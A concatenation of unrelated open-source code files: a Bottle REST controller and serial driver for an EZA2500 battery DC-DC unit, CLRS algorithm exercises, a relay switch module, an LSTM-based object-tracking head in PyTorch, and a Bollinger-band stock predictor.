params['dig'] = essx.ESSXGlobal.get(0, 'dig')
else:
raise ESSXParameterException("No dig")
if 'dvg' in req_params:
params['dvg'] = req_params['dvg']
elif essx.ESSXGlobal.has(0, 'dvg'):
params['dvg'] = essx.ESSXGlobal.get(0, 'dvg')
else:
raise ESSXParameterException("No dvg")
if 'drg' in req_params:
params['drg'] = req_params['drg']
elif essx.ESSXGlobal.has(0, 'drg'):
params['drg'] = essx.ESSXGlobal.get(0, 'drg')
else:
params['drg'] = 0
global _global_current_mode #############Added for v1.3 2018/11/14###########################
params['current_mode'] = _global_current_mode #############Added for v1.3 2018/11/14###########################
res = controller.remote_set(params)
_global_current_mode = res['status']['operationMode'] #############Added for v1.3 2018/11/14###########################
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.put(0, 'mode', params['mode'])
essx.ESSXGlobal.put(0, 'dig', params['dig'])
essx.ESSXGlobal.put(0, 'dvg', params['dvg'])
essx.ESSXGlobal.put(0, 'drg', params['drg'])
return r
@route('/remote/set/current')
@essx_exception_handler
def cmd_remote_set_current():
params = {}
req_params = bottle.request.params
# modeは下層で必須だが指定はできない
if essx.ESSXGlobal.has(0, 'mode'):
params['mode'] = essx.ESSXGlobal.get(0, 'mode')
else:
raise ESSXParameterException("No operationMode")
# digは必須である(仕様書の読み方では無くてもよいようにも取れるが)
if 'dig' in req_params:
params['dig'] = req_params['dig']
# elif essx.ESSXGlobal.has(0, 'dig'):
# params['dig'] = essx.ESSXGlobal.get(0, 'dig')
else:
raise ESSXParameterException("No dig")
# dvgは下層で必須だが指定はできない
if essx.ESSXGlobal.has(0, 'dvg'):
params['dvg'] = essx.ESSXGlobal.get(0, 'dvg')
else:
raise ESSXParameterException("No dvg")
# drgは下層で必要だが指定はできない
if essx.ESSXGlobal.has(0, 'drg'):
params['drg'] = essx.ESSXGlobal.get(0, 'drg')
else:
params['drg'] = 0
res = controller.remote_set_current(params)
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.put(0, 'dig', params['dig'])
return r
@route('/remote/set/voltage')
@essx_exception_handler
def cmd_remote_set_voltage():
params = {}
req_params = bottle.request.params
# modeは下層で必要だが指定はできない
if essx.ESSXGlobal.has(0, 'mode'):
params['mode'] = essx.ESSXGlobal.get(0, 'mode')
else:
raise ESSXParameterException("No operationMode")
# digは下層で必要だが指定はできない
if essx.ESSXGlobal.has(0, 'dig'):
params['dig'] = essx.ESSXGlobal.get(0, 'dig')
else:
raise ESSXParameterException("No dig")
# dvgは必須である(仕様書の読み方では無くてもよいようにも取れるが)
if 'dvg' in req_params:
params['dvg'] = req_params['dvg']
# elif essx.ESSXGlobal.has(0, 'dvg'):
# params['dvg'] = essx.ESSXGlobal.get(0, 'dvg')
else:
raise ESSXParameterException("No dvg")
# drgは下層で必要。無い場合は0になる。
if 'drg' in req_params:
params['drg'] = req_params['drg']
elif essx.ESSXGlobal.has(0, 'drg'):
params['drg'] = essx.ESSXGlobal.get(0, 'drg')
else:
params['drg'] = 0
res = controller.remote_set_voltage(params)
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
essx.ESSXGlobal.put(0, 'dvg', params['dvg'])
essx.ESSXGlobal.put(0, 'drg', params['drg'])
return r
@route('/remote/ioctl/set')
@essx_exception_handler
def cmd_remote_ioctl_set():
app_config.reload()
dcdc_unit =0
battery_unit = 0
ess_system_config = app_config['ess_system']
dcdc_config = ess_system_config['dcdc_dev'][dcdc_unit]
bat_config = ess_system_config['battery_dev'][battery_unit]
dcdc_config_name = dcdc_config['config']
bat_config_name = bat_config['config']
controller.dcdc_config = app_config['dcdc'][dcdc_config_name]
controller.bat_config = app_config['battery'][bat_config_name]
params = {}
res = controller.remote_ioctl_set(params)
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/all/get')
@route('/remote/ioctl/get')
@essx_exception_handler
def cmd_remote_ioctl_get():
params = {}
res = controller.remote_ioctl_get(params)
if bottle.request.fullpath == '/all/get':
res = {
'rsoc': res['rsoc'],
'battery_operation_status': res['battery_operation_status'],
'meter': res['meter'],
'param': res['param'],
'status': res['status'],
'vdis': res['vdis']
}
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/remote/ioctl/clr_alarm')
@essx_exception_handler
def cmd_remote_ioctl_clr_alarm():
params = {}
res = controller.remote_ioctl_clr_alarm(params)
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
@route('/version/get')
@essx_exception_handler
def cmd_version_get():
res = {
"comm_interface_version": "2.0",
"dcdc_batt_comm_version": "1.4"
}
r = HTTPResponse(status=200, body = res)
r.set_header('Content-Type', 'application/json')
return r
app_config = ESSXConfig(args.config)
controller = init_controller()
class MyJSONPlugin(bottle.JSONPlugin):
def __init__(self):
super().__init__()
self.plain_dump = self.json_dumps
self.json_dumps = lambda body: self.plain_dump(body, default=self.convert)
def convert(self, obj):
if isinstance(obj, Decimal):
return float(obj)
elif isinstance(obj, datetime.datetime):
return obj.isoformat()
else:
raise TypeError('{} is not JSON serializable'.format(repr(obj)))
bottle.install(MyJSONPlugin())
bottle.run(host = "0.0.0.0", port = args.port, debug = args.debug)
```
#### File: drivers/eza2500/command1101.py
```python
from struct import pack, unpack
import os
from essx import essx_debug
from essx.essx_exception import ESSXDeviceException, ESSXValueException, ESSXParameterException, ESSXException
from eza2500 import eza2500_base
from eza2500 import eza2500_util
class Command1101(eza2500_base.EZA2500CommandBase):
""" EZA2500 11-1 """
COMMAND = 10
CMD_LEN = 0
ACK_LEN = 16
NAK_LEN = 2
def __init__(self, device):
super(Command1101, self).__init__(device)
self.response = {}
def pack_senddata(self, ad1, ad2, params = {}):
req = pack("<BBBBB", 0x05 ,self.CMD_LEN ,ad1 ,ad2 ,10) + b"00"
return eza2500_util.replace_check_sum(req)
def send(self, ad1, ad2, params = {}):
send_data = self.pack_senddata(ad1, ad2, params)
essx_debug.log('send')
essx_debug.dump(send_data)
self.device.write(send_data)
return send_data
def recv(self):
essx_debug.log('recv')
recv_data = self._recv()
self.response_raw = recv_data
res = {}
(_sfd, _len, _ad1, _ad2, _cmd) = unpack("BBBBB", recv_data[0:5])
if _cmd == 0x0a: #ACK
(_ts ,_tp ,_v5s ,_fan1 ,_fan2 ,_fan3 ,_fan4 ,_fan5 ,_chksum) = unpack("<hhhhhhhhH", recv_data[5:])
_v5s = eza2500_util.q_denormalize(_v5s, 10, '1', 'None', 'None', 'v5s')
_fan1 = eza2500_util.q_denormalize(_fan1, 0, '1', 'None', 'None', 'fan1')
_fan2 = eza2500_util.q_denormalize(_fan2, 0, '1', 'None', 'None', 'fan2')
_fan3 = eza2500_util.q_denormalize(_fan3, 0, '1', 'None', 'None', 'fan3')
_fan4 = eza2500_util.q_denormalize(_fan4, 0, '1', 'None', 'None', 'fan4')
_fan5 = eza2500_util.q_denormalize(_fan5, 0, '1', 'None', 'None', 'fan5')
res["ts"] = _ts
res["tp"] = _tp
res["v5s"] = _v5s
res["fan1"] = _fan1
res["fan2"] = _fan2
res["fan3"] = _fan3
res["fan4"] = _fan4
res["fan5"] = _fan5
res["chksum"] = _chksum
self.response = res
elif _cmd == 0x8a: #NAK
(_ercd ,_chksum) = unpack("<HH", recv_data[5:])
res["ercd"] = _ercd
res["chksum"] = _chksum
self.response = res
raise ESSXDeviceException("error: ERCD=%x" % _ercd)
else:
raise ESSXValueException("bad response")
self.response = res
essx_debug.log('recv')
#essx_debug.dump(recv_data)
return recv_data
@classmethod
def unit_test(cls, dev = None, params = None):
from io import BytesIO
class Dummy:
def __init__(self):
_ts = 0
_tp = 0
_v5s = 0.0
_v5s = int(eza2500_util.q_normalize(_v5s, 10, '1', 'None', 'None', 'v5s'))
_fan1 = 0.0
_fan1 = int(eza2500_util.q_normalize(_fan1, 0, '1', 'None', 'None', 'fan1'))
_fan2 = 0.0
_fan2 = int(eza2500_util.q_normalize(_fan2, 0, '1', 'None', 'None', 'fan2'))
_fan3 = 0.0
_fan3 = int(eza2500_util.q_normalize(_fan3, 0, '1', 'None', 'None', 'fan3'))
_fan4 = 0.0
_fan4 = int(eza2500_util.q_normalize(_fan4, 0, '1', 'None', 'None', 'fan4'))
_fan5 = 0.0
_fan5 = int(eza2500_util.q_normalize(_fan5, 0, '1', 'None', 'None', 'fan5'))
_chksum = 0
data = pack("<BBBBBhhhhhhhhH", 2, Command1101.ACK_LEN, 1, 2, 0x0a, _ts ,_tp ,_v5s ,_fan1 ,_fan2 ,_fan3 ,_fan4 ,_fan5 ,_chksum)
_chksum = eza2500_util.calc_check_sum(data)
self.reader = BytesIO(data[:-2] + pack('BB', _chksum % 256, _chksum // 256))
def read(self, bytes):
return self.reader.read(bytes)
def write(self, data):
essx_debug.dump(data)
if dev == None:
dev = Dummy()
cmd = Command1101(dev)
if params == None:
params = {}
cmd.send(1, 2, params)
cmd.recv()
#単体テストをするにはPYTHONPATHに一つ上のディレクトリを指定すること
if __name__ == "__main__":
import sys
#import serial
import essx
from eza2500_device import EZA2500Device
if len(sys.argv) > 1 and sys.argv[1] == '1':
ser_dev = essx.essx_rs232c.ESSXRS232C('/dev/cuaU1', 115200)
dev = EZA2500Device(dev = ser_dev, timeout = 1)
else:
dev = None
try:
Command1101.unit_test(dev)
except ESSXException as err:
print(err.reason)
raise err
```
#### File: drivers/eza2500/eza2500_device.py
```python
import datetime
import serial
import time
import os
from essx.essx_exception import *
from essx import essx_debug
from eza2500 import eza_device
class EZA2500Device(eza_device.EZADevice):
"""
EZA2500と通信をするクラス
@param dev 通信デバイス read / writeが実装されていること
@param timeout タイムアウト時間。read / writeでこの時間を経過するとESSXTimeoutException
"""
def __init__(self, dev = None, timeout = None):
self.ser = dev #
self.ser.timeout = 0.01
self.timeout = timeout
#単体テストをするにはPYTHONPATHに一つ上のディレクトリを指定すること
if __name__ == "__main__":
from struct import *
from io import BytesIO
class DummySerial(object):
def __init__(self):
self.reader = BytesIO(b"ABCDEFG")
self.writer = BytesIO()
def read(self, size):
ret = self.reader.read(size)
return ret
def write(self, data):
essx_debug.dump(data)
self.writer.write(data)
return len(data)
#ser_dev = serial.Serial("/dev/cuaU1", 115200, timeout = 0.01)
eza2500_dev = EZA2500Device(dev = DummySerial(), timeout = 1)
wdata = pack("<BBBBBH", 5, 0, 0x31, 0x32, 0, 0x31 + 0x32)
eza2500_dev.write(wdata)
print('201 ok')
essx_debug.dump(eza2500_dev.read(7)) #=> no timeout
print('202 ok')
try:
essx_debug.dump(eza2500_dev.read(7)) #=> timeout
raise ESSXFatalException("fatal")
except ESSXTimeoutException as e:
print('203 ok')
``` |
{
"source": "jinurajan/CLRS",
"score": 4
} |
#### File: CLRS/chapter_2/2.3-7_find_integers_with_k_sum.py
```python
def merge(A, p, q, r):
n1 = q - p + 1
n2 = r - q
L = [0] * n1
R = [0] * n2
for i in range(0, n1):
L[i] = A[p + i]
for j in range(0, n2):
R[j] = A[q + 1 + j]
i, j = 0, 0
k = p
while i < n1 and j < n2:
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
k += 1
while i < n1:
A[k] = L[i]
i += 1
k += 1
while j < n2:
A[k] = R[j]
j += 1
k += 1
def mergesort(A, p, r):
if p < r:
q = (p + (r - 1)) // 2
mergesort(A, p, q)
mergesort(A, q + 1, r)
merge(A, p, q, r)
return A
def bin_search(arr, l, r, x):
if l < r:
mid = (l + (r - 1)) / 2
if arr[mid] == x:
return True
if arr[mid] > x:
return bin_search(arr, l, mid-1, x)
return bin_search(arr, mid+1, r, x)
return False
def bin_search_1(arr, l, r, x):
if l < r:
mid = (l + (r - 1)) / 2
if arr[mid] == x:
return mid
if arr[mid] > x:
return bin_search_1(arr, l, mid-1, x)
return bin_search_1(arr, mid+1, r, x)
return -1
def pair_exists(s, x):
"""
1. sort using merge sort O(nlogn)
2. search compliment using binary search O(logn)
total = O(nlogn) + O(logn) == 0(logn)
"""
if not s:
return False
l = len(s)
s = mergesort(s, 0, l - 1) # takes O(nlogn)
for i in range(l):
# problem will exist for values like 8 and ith value s again 8
if bin_search(s, 0, l - 1, x - s[i]):
return True
return False
def pair_exists_1(s, x):
"""
1. sort using merge sort
2. use two pointer method to see if the pair has sum and stop whereever the sum is < x
"""
if not s:
return False
n = len(s)
s = mergesort(s, 0, n - 1) # takes O(nlogn)
l = 0
r = n-1
while l <= r:
if s[l] + s[r] == x:
return True
elif s[l] + s[r] > x:
r -= 1
else:
l += 1
return False
def pair_exists_2(s, x):
"""
1. sort using merge sort O(nlogn)
2. search compliment using binary search O(logn)
total = O(nlogn) + O(logn) == 0(logn)
"""
if not s:
return False
l = len(s)
s = mergesort(s, 0, l - 1) # takes O(nlogn)
for i in range(l):
# problem will exist for values like 8 and ith value s again 8
search_val = bin_search_1(s, 0, l - 1, x - s[i])
if search_val != -1 and search_val != i:
return True
return False
print pair_exists([3, 4, 6, 2, 7], 9)
print pair_exists([3, 4, 6, 2, 7], 15)
print pair_exists_1([3, 4, 6, 2, 7], 9)
print pair_exists_1([3, 4, 6, 2, 7], 15)
print pair_exists_2([3, 4, 6, 2, 7], 9)
print pair_exists_2([3, 4, 4, 2, 7], 8)
print pair_exists_2([3, 4, 6, 2, 7], 15)
```
#### File: CLRS/chapter_2/2_n_bit_binary_sum.py
```python
def binSum(a, b):
if a == 1 and b == 1:
return 10
elif a == 0 and b == 0:
return 0
else:
return 1
def nbitsum(A, B):
if len(A) != len(B):
# invalid case
return
c = [0] * (len(A) + 1)
c_n = len(A)
rem = 0
n = len(A) - 1
while n >= 0:
val = binSum(A[n], B[n])
if val == 10:
if not rem:
val = 0
rem = 1
else:
val = 1
rem = 1
else:
if rem:
val = binSum(val, rem)
c[c_n] = val
c_n -= 1
n -= 1
if rem:
c[c_n] = rem
return c
if __name__ == "__main__":
A = [1, 1, 1]
B = [1, 1, 1]
print nbitsum(A, B)
A = [1, 0, 0]
B = [1, 1, 0]
print nbitsum(A, B)
```
#### File: CLRS/chapter_2/3_selection_sort.py
```python
def selection_sort(array):
n = len(array)
for i in range(n):
min_index = i
for j in range(i + 1, n):
if array[j] <= array[min_index]:
min_index = j
array[i], array[min_index] = array[min_index], array[i]
return array
def selection_sort_descending(array):
n = len(array)
for i in range(n):
max_index = i
for j in range(i + 1, n):
if array[j] >= array[max_index]:
max_index = j
array[i], array[max_index] = array[max_index], array[i]
return array
print selection_sort([6, 5, 4, 3, 2, 1])
print selection_sort_descending([1, 2, 3, 4, 5, 6])
``` |
{
"source": "jinuskr/jinuspi",
"score": 2
} |
#### File: jinuskr/jinuspi/console.py
```python
from relay_switch import Power
power = Power(channel=4)
def power_on():
power.on()
def power_off():
power.off()
``` |
{
"source": "jinw0o0/TASUF",
"score": 3
} |
#### File: models/track_heads/track_head_tasuf.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from mmdet.core import (delta2bbox, multiclass_nms, bbox_target,
weighted_cross_entropy, weighted_smoothl1, accuracy)
from ..registry import HEADS
@HEADS.register_module
class TrackHeadTASUF(nn.Module):
"""Tracking head, predict tracking features and match with reference objects
Use dynamic option to deal with different number of objects in different
images. A non-match entry is added to the reference objects with all-zero
features. Object matched with the non-match entry is considered as a new
object.
"""
def __init__(self,
with_avg_pool=False,
num_fcs = 2,
in_channels=256,
roi_feat_size=7,
fc_out_channels=1024,
match_coeff=None,
bbox_dummy_iou=0,
dynamic=True
):
super(TrackHeadTASUF, self).__init__()
self.in_channels = in_channels
self.with_avg_pool = with_avg_pool
self.roi_feat_size = roi_feat_size
self.match_coeff = match_coeff
self.bbox_dummy_iou = bbox_dummy_iou
self.num_fcs = num_fcs
if self.with_avg_pool:
self.avg_pool = nn.AvgPool2d(roi_feat_size)
else:
in_channels *= (self.roi_feat_size * self.roi_feat_size)
# LSTM:
# There was no empirical exploration on 'input_size', 'hidden_size' and 'num_layers'.
self.lstm = nn.LSTM(input_size=1024, hidden_size=1024,
num_layers=2, batch_first=False)
# Convert ROI feature map of (7 x 7 x 256) to input vector for LSTM.
self.in_fcs = nn.ModuleList()
# Convert ROI feature map of (7 x 7 x 256) to an vector for matching score computation.
self.query_fcs = nn.ModuleList()
for i in range(num_fcs):
in_channels = (in_channels
if i == 0 else fc_out_channels)
self.in_fcs.append(nn.Linear(in_channels, fc_out_channels))
self.query_fcs.append(nn.Linear(in_channels, fc_out_channels))
self.relu = nn.ReLU(inplace=True)
self.debug_imgs = None
self.dynamic=dynamic
def init_weights(self):
for fc in self.in_fcs:
nn.init.normal_(fc.weight, 0, 0.01)
nn.init.constant_(fc.bias, 0)
for fc in self.query_fcs:
nn.init.normal_(fc.weight, 0, 0.01)
nn.init.constant_(fc.bias, 0)
def compute_comp_scores(self, match_ll, bbox_scores, bbox_ious, label_delta, add_bbox_dummy=False):
# compute comprehensive matching score based on matchig likelihood,
# bbox confidence, and ious
if add_bbox_dummy:
bbox_iou_dummy = torch.ones(bbox_ious.size(0), 1,
device=torch.cuda.current_device()) * self.bbox_dummy_iou
bbox_ious = torch.cat((bbox_iou_dummy, bbox_ious), dim=1)
label_dummy = torch.ones(bbox_ious.size(0), 1,
device=torch.cuda.current_device())
label_delta = torch.cat((label_dummy, label_delta),dim=1)
if self.match_coeff is None:
return match_ll
else:
# match coeff needs to be length of 3
assert(len(self.match_coeff) == 3)
return match_ll + self.match_coeff[0] * \
torch.log(bbox_scores) + self.match_coeff[1] * bbox_ious \
+ self.match_coeff[2] * label_delta
def forward(self, x, ref_x, x_n, ref_x_n, gt_pids_list):
# x and ref_x are the grouped bbox features of current and reference frame
# x_n are the numbers of proposals in the current images in the mini-batch,
# ref_x_n are the numbers of ground truth bboxes in the reference images.
# here we compute a correlation matrix of x and ref_x
# we also add a all 0 column denote no matching
batch_size = len(x_n)
num_ref = len(ref_x)
# Just rename the given parameters to match with the implicit attribute.
ref_x_list = ref_x
ref_x_n_list = ref_x_n
for ref_x_n in ref_x_n_list:
assert len(x_n) == len(ref_x_n)
# Resize tensors to give it as input to FCs
# (B * #proposals, 256, 7, 7) -> (B * #proposals, 256 * 7 * 7)
x = x.view(x.size(0), -1)
# (seq_len, B * (#objects_1 + #objects_2 + ...), 256, 7, 7)
# -> (seq_len, B * (#objects_1 + #objects_2 + ...), 256 * 7 * 7)
ref_x_list = [ref_x.view(ref_x.size(0), -1) for ref_x in ref_x_list]
# Convert ROI feature to the query vector for matching score computation.
# (B * #proposals, 256 * 7 * 7) -> (B * #proposals, 1024)
for idx, fc in enumerate(self.query_fcs):
x = fc(x)
if idx < len(self.query_fcs) - 1:
x = self.relu(x)
# Convert ROI feature to the input vector for LSTM
# (seq_len, B * (#objects_1 + #objects_2 + ...), 256 * 7 * 7) -> (seq_len, B * (#objects_1 + #objects_2 + ...), 1024)
for idx, fc in enumerate(self.in_fcs):
ref_x_list = list(map(fc, ref_x_list))
if idx < len(self.in_fcs) - 1:
ref_x_list = list(map(self.relu, ref_x_list))
# Split tensors along the batch size (B).
# (B * #proposals, 1024) -> (B, #proposals, 1024)
# x_split:
# Each element consists of (#proposals=x_n[i], 1024) tensor.
x_split = torch.split(x, x_n, dim=0)
# (seq_len, B * (#objects_1 + #objects_2 + ...), 1024) -> (seq_len, B, sum(#objects_i), 1024)
ref_x_split_list = [torch.split(ref_x, ref_x_n, dim=0)
for ref_x, ref_x_n, in zip(ref_x_list, ref_x_n_list)]
# ref_x_dict_list:
# Description:
# List of ref_x_dict for each batch.
# Shape:
# (B, #ref_gt_pid, < seq_len, 1024)
#
# ref_x_dict:
# Description:
# ref_x_dict[gt_pid] is fed as input to the LSTM
# to update hidden state corresponding to the specific 'gt_pid',
# Key:
# ref_gt_pid : int
# Value:
# Sequence of 'ref_x_split's corresponding to the designated 'gt_pid'
# : ( < seq_len, 1024)
ref_x_dict_list = []
for b in range(batch_size):
ref_x_dict = dict()
for i, ref_gt_pids in enumerate(gt_pids_list[:-1]): # Except for gt_pids of 'x' which is the current frame.
for j, ref_gt_pid in enumerate(ref_gt_pids[b]):
if ref_gt_pid == 0:
continue
ref_gt_pid = ref_gt_pid.item()
if ref_gt_pid in ref_x_dict:
ref_x_dict[ref_gt_pid] = torch.cat([ref_x_dict[ref_gt_pid], ref_x_split_list[i][b][j].unsqueeze(0)], dim=0)
else:
ref_x_dict[ref_gt_pid] = ref_x_split_list[i][b][j].unsqueeze(0)
ref_x_dict_list.append(ref_x_dict)
match_score = []
for b in range(batch_size):
# for each ref_gt_pid
h_t_list = []
for ref_gt_pid, ref_x_split in sorted(ref_x_dict_list[b].items()):
ref_x_split = ref_x_split.unsqueeze(1) # (seq_len, 1024) -> (seq_len, 1, 1024)
_, (h_t, c_t) = self.lstm(ref_x_split) # h_t: (num_layer=2, batch=1, hidden_size=1024)
h_t = h_t.squeeze(1)[-1] # (2, 1, 1024) -> (1024, )
h_t_list.append(h_t)
h_t_list = torch.stack(h_t_list, dim=0) # (#objects, 1024)
prod = torch.mm(x_split[b], torch.transpose(h_t_list, 0, 1))
m = prod.size(0)
dummy = torch.zeros(m, 1, device=torch.cuda.current_device())
prod_ext = torch.cat([dummy, prod], dim=1)
match_score.append(prod_ext)
# match_score: (B, #proposals, #ref_gt_pids + 1)
return match_score
def loss(self,
match_score,
ids,
id_weights,
reduce=True):
losses = dict()
if self.dynamic:
n = len(match_score)
x_n = [s.size(0) for s in match_score]
ids = torch.split(ids, x_n, dim=0)
loss_match = torch.tensor([0.], device=torch.cuda.current_device())
match_acc = 0.
n_total = 0
batch_size = len(ids)
for score, cur_ids, cur_weights in zip(match_score, ids, id_weights):
valid_idx = torch.nonzero(cur_weights).squeeze()
if len(valid_idx.size()) == 0: continue
n_valid = valid_idx.size(0)
n_total += n_valid
loss_match += weighted_cross_entropy(
score, cur_ids, cur_weights, reduce=reduce)
match_acc += accuracy(torch.index_select(score, 0, valid_idx),
torch.index_select(cur_ids,0, valid_idx)) * n_valid
losses['loss_match'] = loss_match / n
if n_total > 0:
losses['match_acc'] = match_acc / n_total
else:
losses['match_acc'] = torch.tensor([100.], device=torch.cuda.current_device())
else:
if match_score is not None:
valid_idx = torch.nonzero(cur_weights).squeeze()
losses['loss_match'] = weighted_cross_entropy(
match_score, ids, id_weights, reduce=reduce)
losses['match_acc'] = accuracy(torch.index_select(match_score, 0, valid_idx),
torch.index_select(ids, 0, valid_idx))
return losses
def forward_test(self, x, ref_x_hidden_states, x_n, ref_x_n):
'''
Args:
ref_x_hidden_states:
LSTM hidden states for each detected objects
Shape: (# detected objects, 2, 1024)
Example:[(h_1, c_1), (h_2, c_2), ... , ]
'''
assert len(x_n) == len(ref_x_n)
batch_size = len(x_n)
# Resize tensors to give it as input to FCs
# (#proposals, 256, 7, 7) -> (#proposals, 256 * 7 * 7)
x = x.view(x.size(0), -1)
# Convert ROI feature to the query vector for matching score computation.
# (#proposals, 256 * 7 * 7) -> (#proposals, 1024)
for idx, fc in enumerate(self.query_fcs):
x = fc(x)
if idx < len(self.query_fcs) - 1:
x = self.relu(x)
match_score = []
prod = []
# (#objects, hidden_state & cell_state = 2, num_layers=2, 1024) -> (#objects, 1024)
ref_x_hidden_states = ref_x_hidden_states[:, 0, -1, 0, :]
prod = torch.mm(x, torch.transpose(ref_x_hidden_states, 0, 1)) # (#proposals, #objects)
m = prod.size(0) # #proposals
dummy = torch.zeros((m, 1), device=torch.cuda.current_device()) # (#proposals, 1)
prod_ext = torch.cat([dummy, prod], dim=1) # (#proposals, #objects + 1)
match_score.append(prod_ext)
# match_score: (B, #proposals, #objects + 1)
return match_score
def init_hidden_states(self, det_roi_feats):
"""
When it is the first time to feed an input vector to LSTM,
update the hidden states based on the initial value of zeros.
Therefore, only input vecotrs (det_roi_feats) are given here.
"""
# det_roi_feats: (#proposals, 256, 7, 7) -> (#proposals, 1024)
det_roi_feats = det_roi_feats.view(det_roi_feats.size(0), -1) # (#proposals, 256 * 7 * 7))
for idx, fc in enumerate(self.in_fcs):
det_roi_feats = fc(det_roi_feats)
if idx < len(self.in_fcs) - 1:
det_roi_feats = self.relu(det_roi_feats)
det_roi_feats = det_roi_feats.unsqueeze(0) # (#proposals, 1024) -> (1, #proposals, 1024)
_, (h_t, c_t) = self.lstm(det_roi_feats) # h_t: (num_layers, #proposals, hidden_size)
h_t = torch.transpose(h_t, 0, 1).unsqueeze(2) # (num_layers, #proposals, hidden_size) -> (#proposals, num_layers, 1, hidden_size)
c_t = torch.transpose(c_t, 0, 1).unsqueeze(2)
hidden_states = torch.stack([h_t, c_t], dim=1).to(torch.cuda.current_device())
# hidden_states: (#proposals, h&c=2, num_layers=2, batch_size=1, hidden_size)
return hidden_states
def update_hidden_state(self, det_roi_feat, hidden_state):
"""
Update the hidden states based on the given hidden states
when given the input vectors and hidden states.
"""
# det_roi_feat: (256, 7, 7)
# hidden_state: (h&c=2, num_layers=2, batch_size=1, hidden_size=1024)
det_roi_feat = det_roi_feat.view(-1).unsqueeze(0) # (256, 7, 7) -> (1, 256 * 7 * 7)
# det_roi_feat: (1, 256 * 7 * 7) -> (1, 1024)
for idx, fc in enumerate(self.in_fcs):
det_roi_feat = fc(det_roi_feat)
if idx < len(self.in_fcs) - 1:
det_roi_feat = self.relu(det_roi_feat)
det_roi_feat = det_roi_feat.unsqueeze(0) # (batch_size=1, 1024) -> (seq_len=1, batch_size=1, 1024)
_, hidden_state = self.lstm(det_roi_feat, hidden_state)
hidden_state = torch.stack(hidden_state, dim=0)
# hidden_state: (h&c=2, num_layers=2, batch=1, hidden_size=1024)
return hidden_state
``` |
{
"source": "jinwb000/nlp",
"score": 2
} |
#### File: jinwb000/nlp/auto_regression_predictor.py
```python
import sys
import datetime
import pytz
import numpy as np
import pandas as pd
import talib as ta
from scipy import stats
def similar(ndarr, hisDf, curDf, cor=0.9, onlyPositiveCorr=True):
tmpDf=hisDf.loc[map(int, ndarr)]
closeCor=stats.pearsonr(tmpDf['Close'].values, curDf['Close'].values)[0]
volCor=stats.pearsonr(tmpDf['Volume'].values, curDf['Volume'].values)[0]
if onlyPositiveCorr:
return 1 if closeCor>cor and volCor>cor else 0
else:
if closeCor>cor and volCor>cor:
return 1
elif closeCor<-cor and volCor<-cor:
return -1
else:
return 0
def predict(inputHisDf, lookAheadDays=3, windowSize=20, minCorr=0.9, onlyPositiveCorr=True):
trendWindow = 5
stdGap = 1.25
hisDf = inputHisDf.set_index('index', drop=False).tail(windowSize+1)
pU, pM, pL = ta.BBANDS(hisDf['OrigClose'].head(windowSize).astype(float).values, timeperiod=trendWindow, nbdevup=stdGap, nbdevdn=stdGap)
volU, volM, volL = ta.BBANDS(hisDf['OrigVolume'].head(windowSize).astype(float).values, timeperiod=trendWindow, nbdevup=stdGap, nbdevdn=stdGap)
preP = hisDf['OrigClose'].iat[-2]
curP = hisDf['OrigClose'].iat[-1]
preV = hisDf['OrigVolume'].iat[-2]
curV = hisDf['OrigVolume'].iat[-1]
pUSlope = _array_slope(pU[-trendWindow:])
pMSlope = _array_slope(pM[-trendWindow:])
volUSlope = _array_slope(volU[-trendWindow:])
volMSlope = _array_slope(volM[-trendWindow:])
if volMSlope > 0: #goes upper with larger std
if curP > pL[-1] and preP < pL[-1]:
return 1
if curP < pU[-1] and preP > pU[-1]:
return -1
'''
if pUSlope > 0 and pMSlope > 0 and pUSlope-pMSlope > 0: #goes upper with larger std
if curP > pU[-1] and preP < pU[-1]:
return 1
elif curP < pU[-1] and preP > pU[-1]:
return -1
elif curP < pL[-1] and preP > pL[-1]:
return -1
elif curP > pL[-1] and preP < pL[-1]:
return 1
elif pUSlope < 0 and pMSlope < 0 and pUSlope-pMSlope < 0: #goes down with small std
if curP > pL[-1] and preP < pL[-1]:
return 1
elif curP < pL[-1] and preP > pL[-1]:
return -1
if volUSlope > 0 and volMSlope > 0 and volUSlope-volMSlope > 0:
if curP > pL[-1] and preP < pL[-1]:
return 1
if curP > pM[-1] and pMSlope > 0:
return 1
if curP < pU[-1] and preP > pU[-1]:
return -1
if curP < pM[-1] and pMSlope < 0:
return -1
elif volUSlope < 0 and volMSlope < 0 and volUSlope-volMSlope < 0:
if curP < pU[-1] and preP > pU[-1]:
return -1
'''
return 0
def _array_slope(series):
if isinstance(series, list) or isinstance(series, np.ndarray):
series = pd.Series(series)
assert isinstance(series, pd.Series)
X = pd.Series(range(len(series)))
return X.corr(series)
def predict_bl(inputHisDf, lookAheadDays=3, windowSize=20, minCorr=0.9, onlyPositiveCorr=True):
hisDf = inputHisDf.set_index('index', drop=False)
std = pd.rolling_std(hisDf, windowSize)
mvg = pd.rolling_mean(hisDf, windowSize)
lastClose = hisDf.iloc[-1]['OrigClose']
lastMvg = mvg.iloc[-1]['OrigClose']
lastStd = std.iloc[-1]['OrigClose']
if lastStd == 0:
return 0
diversion = (lastClose - lastMvg)/lastStd
if diversion > 1.5:
return -1
if diversion < -1.5:
return 1
return 0
def predict_ar(inputHisDf, lookAheadDays=3, windowSize=20, minCorr=0.9, onlyPositiveCorr=True):
hisDf = inputHisDf.set_index('index', drop=False)
ecurDf=hisDf[-windowSize:]
ehisDf=hisDf[:-windowSize]
if pd.__version__ < '0.18':
hisSim=pd.rolling_apply(ehisDf['index'], windowSize, similar, args=(ehisDf,ecurDf,minCorr,onlyPositiveCorr))
else:
hisSim=ehisDf['index'].rolling(center=False,window=windowSize).apply(func=similar, args=(ehisDf,ecurDf,minCorr,onlyPositiveCorr), reduce=False)
hisSim=hisSim[hisSim.index<len(hisDf)-lookAheadDays]
#Close are already MAed, may be not suitable to use
#positiveSim=hisDf.iloc[hisSim[hisSim>0].index+lookAheadDays]['Close'].values/hisDf.iloc[hisSim[hisSim>0].index]['Close']-1
